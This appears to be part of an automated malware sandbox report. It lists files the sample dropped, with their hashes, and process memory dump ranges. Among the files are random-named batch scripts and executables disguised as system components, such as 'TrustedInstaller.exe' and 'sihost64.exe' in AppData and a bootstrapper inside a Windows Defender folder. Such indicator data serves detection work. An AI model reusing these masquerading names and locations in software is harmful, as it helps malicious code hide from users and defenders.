memory/4084-116-0x0000000000EC0000-0x0000000000ED6000-memory.dmp

memory/4084-119-0x00000000028A0000-0x00000000028AE000-memory.dmp

memory/4084-118-0x0000000000EE0000-0x0000000000EEE000-memory.dmp

memory/4084-115-0x0000000000E70000-0x0000000000E78000-memory.dmp

memory/4084-114-0x0000000002A10000-0x0000000002A60000-memory.dmp

memory/4084-120-0x00000000028B0000-0x00000000028BA000-memory.dmp

memory/4084-121-0x00000000028C0000-0x00000000028CC000-memory.dmp

C:\Windows\Installer\MSID11B.tmp

MD5 9fe9b0ecaea0324ad99036a91db03ebb
SHA1 144068c64ec06fc08eadfcca0a014a44b95bb908
SHA256 e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9
SHA512 906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

C:\Windows\Installer\MSID1AA.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

memory/416-195-0x000002F4B9170000-0x000002F4B9192000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_judnfojy.lnq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\ZgZhaJuw4k.bat

MD5 844984ebf0448679b26b60f184d93a68
SHA1 00254004f97ae60f365074ee756aaf207575b372
SHA256 803a36c6f3a87f3d136f3958c64f1b258ed9ee4c9f31a23d19b6992ae815c78a
SHA512 c67b3bee66a08ff5de42b7ec415ce919231212c94a830c0e11924c32ef022aba8ea2a0daf730eb0c112f73d8611bd4424657b896df8d495c8b47d3acb9d8342d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59d97011e091004eaffb9816aa0b9abd
SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e448fe0d240184c6597a31d3be2ced58
SHA1 372b8d8c19246d3e38cd3ba123cc0f56070f03cd
SHA256 c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391
SHA512 0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e243a38635ff9a06c87c2a61a2200656
SHA1 ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256 af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

memory/6600-409-0x00000184B4F70000-0x00000184B5191000-memory.dmp

memory/6600-410-0x00000184CFA60000-0x00000184CFC80000-memory.dmp

memory/6600-411-0x00000184B5520000-0x00000184B5532000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3f038ac2e2ceadad0f78317ea7de6881
SHA1 f2ee66d1ab22d5594426a26e9d2628ce29b037a7
SHA256 475591875182108710538a2ea21a89e0ffa1df43f776689288e0fa96da46efb7
SHA512 f751f1f06b79550af211a9bf39d59712bb60f4e2c79a24d850970b1d40e871c2e53ce84ed4f5d974dad53cdbfb95d38a8eff9f871f22ae2d3e772deb731715f4

C:\Windows\xdwd.dll

MD5 16e5a492c9c6ae34c59683be9c51fa31
SHA1 97031b41f5c56f371c28ae0d62a2df7d585adaba
SHA256 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA512 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

memory/7124-485-0x000001D8CC700000-0x000001D8CC91C000-memory.dmp

C:\Windows\Installer\MSIF495.tmp

MD5 7a86ce1a899262dd3c1df656bff3fb2c
SHA1 33dcbe66c0dc0a16bab852ed0a6ef71c2d9e0541
SHA256 b8f2d0909d7c2934285a8be010d37c0609c7854a36562cbfcbce547f4f4c7b0c
SHA512 421e8195c47381de4b3125ab6719eec9be7acd2c97ce9247f4b70a309d32377917c9686b245864e914448fe53df2694d5ee5f327838d029989ba7acafda302ec

C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat

MD5 81c6a00913630266cef3d07065db9b1f
SHA1 db6260ef38563ec05f910277af358fbaa2387154
SHA256 5898912e30972853e1b8ee628e9c300f25c5959d11e6b91b6454ddc19e328cf4
SHA512 a643512ca118e8745ae8aafb010bb21099ba0a358eb8a951471cc5092e14c51ffafae0c288d84ddcda5eaad2a3e93b30ecd205bfe0938a21f05e6c87ead3cb36

memory/2556-520-0x0000000000550000-0x00000000006E6000-memory.dmp

C:\Program Files (x86)\Windows Defender\ja-JP\SolaraBootstrapper.exe

MD5 e41ef428aaa4841f258a38dc1cc305ef
SHA1 edf3a17831e013b74479e2e635b8cf0c1b3787ce
SHA256 6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995
SHA512 a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd

memory/2556-537-0x000000001B740000-0x000000001B8E9000-memory.dmp

memory/5428-569-0x0000000000550000-0x000000000072A000-memory.dmp

memory/5428-571-0x00000000027C0000-0x00000000027CE000-memory.dmp

memory/5428-573-0x00000000029B0000-0x00000000029CC000-memory.dmp

memory/5428-575-0x000000001B3B0000-0x000000001B3C8000-memory.dmp

memory/5428-577-0x0000000002860000-0x000000000286C000-memory.dmp

memory/6104-584-0x000000001DB30000-0x000000001DCF2000-memory.dmp

memory/6104-658-0x000000001E830000-0x000000001ED58000-memory.dmp

memory/5428-761-0x000000001BD40000-0x000000001BEE9000-memory.dmp

memory/5428-760-0x000000001B860000-0x000000001B92D000-memory.dmp

memory/6104-882-0x000000001E300000-0x000000001E4A9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6019bc03fe1dc3367a67c76d08b55399
SHA1 3d0b6d4d99b6b8e49829a3992072c3d9df7ad672
SHA256 7f88db7b83b11cd8ea233efc3a1498635b68771482658255750df564a065f7d0
SHA512 6b5409780a23e977b0bbe463e351f1d474539100aeaa01b0b7fe72aa6dbfb3c0fec64fe9db65b63d188a279b65eae7f31ef0b6880c67ada9ab175da419f595eb

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

MD5 26e388ea32df635cd424decb2bff563e
SHA1 510ac8024dd524f7ebc92210b189804921fd29ee
SHA256 cf90b0e7318a9e4e3cbaeebd3f82f823e7754a35e689979fabd18e785383dc8e
SHA512 b59ecb856064e3d590ec3d0f17410195bf08cd6a2b0bb091c92c9200c3e163f5b0e918b09f7ff0f51990dae49ba27ea566862353647ee59ae9ea9c192faf79d1

memory/2568-973-0x00007FFA562C3000-0x00007FFA562C5000-memory.dmp

memory/5564-975-0x000000001D200000-0x000000001D3A9000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 c1a4a4340b4aaf6b72487d4d011fdee9
SHA1 c1a25eeeb340d226fa996fd8b6e9559d3112b4c5
SHA256 858259d792411041f71a344c219b120bd494de51529259dac6846ae8e7e9bc19
SHA512 76316cb27ac8729ab8f972229c25e521213295c2a6b21b073cb9b258b056e85facd86754abbf1a7e89b7516a1a184b6826a078ddb56f4c9bb2de5c3844929f37

memory/6300-1020-0x000000001CFF0000-0x000000001D0BD000-memory.dmp

memory/6300-1019-0x000000001CBC0000-0x000000001CD69000-memory.dmp

memory/5772-1038-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1036-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1044-0x0000000002330000-0x0000000002350000-memory.dmp

memory/5772-1048-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1050-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1049-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1047-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1051-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1114-0x0000000140000000-0x0000000140786000-memory.dmp

memory/6556-1184-0x00000283ACDF0000-0x00000283ACDF6000-memory.dmp

memory/6556-1185-0x00000283AE910000-0x00000283AE916000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1GM0ipPvd9

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Temp\mZIUi6AW76

MD5 20698b0aeafa51b961cd383ef3f99ccb
SHA1 a81cf3b3e1da80e1a99faf0cc47e6f93087b755c
SHA256 9e58a7cfc4125c430dc8aa17d4aaeac7646efc556bb26f859559b957f68240dd
SHA512 85bf507f86a743343141d0654ab47db8ccf1674de25e742be7c5f3925befcaac917b5e65d8b9a9272de05c250dd442e0b1bcdae68947c7e418adebde9f2e37fe

C:\Users\Admin\AppData\Local\Temp\NInF07QEZ5

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\hOlA4rmdHM

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/5772-1373-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1375-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5772-1374-0x0000000140000000-0x0000000140786000-memory.dmp

memory/6300-1432-0x000000001CBC0000-0x000000001CD69000-memory.dmp

memory/6668-2096-0x00000000001B0000-0x00000000001B8000-memory.dmp

memory/7140-2113-0x0000000000010000-0x0000000000018000-memory.dmp

memory/2648-2226-0x0000000000400000-0x0000000000408000-memory.dmp

memory/6720-2299-0x0000000000610000-0x0000000000618000-memory.dmp

memory/7068-2308-0x0000000000FF0000-0x0000000000FF8000-memory.dmp

memory/6300-2324-0x000000001CBC0000-0x000000001CD69000-memory.dmp

memory/2260-2406-0x0000000000D60000-0x0000000000D68000-memory.dmp

memory/6628-2408-0x0000000000F50000-0x0000000000F58000-memory.dmp

memory/5304-2435-0x00000000002D0000-0x00000000002D8000-memory.dmp

memory/688-2503-0x0000000000600000-0x0000000000608000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smss.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

memory/3316-2504-0x0000000000330000-0x0000000000338000-memory.dmp